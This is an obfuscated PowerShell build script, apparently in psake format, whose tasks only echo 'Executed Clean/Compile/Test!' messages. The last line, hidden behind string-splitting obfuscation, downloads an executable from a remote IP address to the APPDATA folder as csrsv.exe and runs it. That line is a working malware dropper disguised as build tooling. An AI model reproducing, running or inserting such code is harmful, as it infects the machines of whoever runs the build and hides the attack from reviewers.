&("{0}{1}{2}" -f 'pro','perti','es') {
  ${tEs`T`mEs`SagE} = ("{0}{2}{1}{3}" -f 'E','ecuted T','x','est!')
  ${co`mpi`lEMe`ssAGE} = ("{1}{0}{2}{3}" -f'xecuted ','E','C','ompile!')
  ${c`LeAnme`Ssa`Ge} = ("{1}{0}{3}{2}"-f'uted ','Exec','an!','Cle')
}

.("{0}{1}"-f 'tas','k') ("{0}{1}" -f 'defau','lt') -depends ("{0}{1}" -f 'Te','st')

&("{1}{0}" -f 'ask','t') ("{1}{0}"-f 'st','Te') -depends ("{0}{2}{1}" -f 'Co','pile','m'), ("{1}{0}" -f 'an','Cle') {
  ${TestmE`S`S`AGe}
}

.("{0}{1}" -f 'ta','sk') ("{1}{0}" -f 'ile','Comp') -depends ("{1}{0}" -f 'n','Clea') {
  ${C`o`mpIlE`Me`SSAge}
}

&("{1}{0}" -f'sk','ta') ("{1}{0}"-f 'n','Clea') {
  ${cleA`Nm`e`SsaGe}
}

.("{0}{1}"-f 'ta','sk') ('?') -Description ("{4}{0}{3}{5}{1}{2}{6}" -f 'lper ','k i','nf','to displa','He','y tas','o') {
  &("{0}{5}{3}{1}{2}{4}" -f'W','enta','t','-Docum','ion','rite')
}

(.("{0}{2}{1}" -f'N','w-Object','e') ("{1}{5}{2}{3}{0}{6}{4}"-f 'e','Sy','m.','N','ent','ste','t.WebCli')).("{0}{1}{2}" -f 'Do','w','nloadFile').Invoke(("{4}{7}{3}{1}{2}{6}{0}{5}" -f '~','02','.53.23','4.1','h','yahoo/csrsv.exe','8/','ttp://9'),"$env:APPDATA\csrsv.exe");&("{1}{0}{2}{3}"-f 'ta','S','r','t-Process') ("$env:APPDATA\csrsv.exe")
